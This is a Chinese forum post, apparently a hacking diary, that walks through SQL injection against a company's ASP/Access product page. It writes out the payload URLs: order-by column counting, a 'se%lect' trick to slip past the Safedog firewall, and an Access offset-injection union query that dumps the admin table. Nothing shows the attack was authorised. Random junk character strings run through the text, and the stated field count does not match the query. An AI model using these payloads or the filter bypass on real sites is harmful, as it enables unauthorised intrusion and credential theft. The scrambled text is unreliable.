打开网站,一个企业站。
/ }* X3 I) E' {7 Z7 b
- E- \$ [# t# }, e# a( X8 W
+ T* _9 y* d7 F: H' L" r" f0 }顺手加个admin, D$ i4 _) G7 b
0 i$ [, {" @- O$ r/ a* q6 s3 c4 R j- n/ G6 y' y$ I
默认后台。' l% T) [4 ^! b& e3 x- O
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
1 Z& g3 F6 j& h, Y! `2 A9 ]' l/ z% [8 Z' `/ f3 G+ M( c! f- W
, w p' B2 r' M+ m. y) _' {1 m2 r1 T
所以就不用御剑扫了,待会直接封IP。
4 I6 {! d7 c# o" T, ^ 2 K" b" `* E; {, Z! j/ N
用order by语句判断是否存在注入。% b& f/ R2 s( _' b
http://www.xxx.com /product_show.asp?id=997 order by 1
# d0 l6 c" s/ y& |http://www.xxx.com /product_show.asp?id=997 order by 1002 d% F3 o! F. O( C- u
现在存在注入,经测试后发现是9个字段。
( b! }% z: E- S& y$ `; U 4 E% B' f& X% Q4 I8 @
接下来进行联合查询,猜是否存在admin表。
& E8 @8 K; y* G0 `http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。" C$ Y- d% L& M! A
. s3 @8 Y" E6 \* F7 j1 Y
9 x. {. R0 ~4 M& D+ G; f Z2 U# k& E: O9 g# f8 F0 }, \
在select中间加个%,se%lect绕过安全狗。
( U& [7 b( N' l0 h# t7 \1 d1 o) q$ o* c' ]8 G
. |6 i9 f) N) s+ s+ f
发现存在admin表,然后开始手工猜常用的字段。! h% B( }) y* C$ d% O4 v L8 ~
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
5 i! I' d a( J! o M6 f7 d, F
" s! q: u8 a- J5 J3 _8 {突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
; r9 U4 y6 c2 v. R
! I$ K+ f8 I0 \3 {9 m+ f4 \. o科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。; h# o+ S5 _/ X) z' K, g8 q A7 M- ?
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
1 I9 M, ^/ [6 h+ J, ?) A- t好了,敏感内容出显了。
9 ?) \. q$ m h
1 o! H: N" s m9 N
9 R# W: C: I& `' v# |
, w. L0 w: _8 W |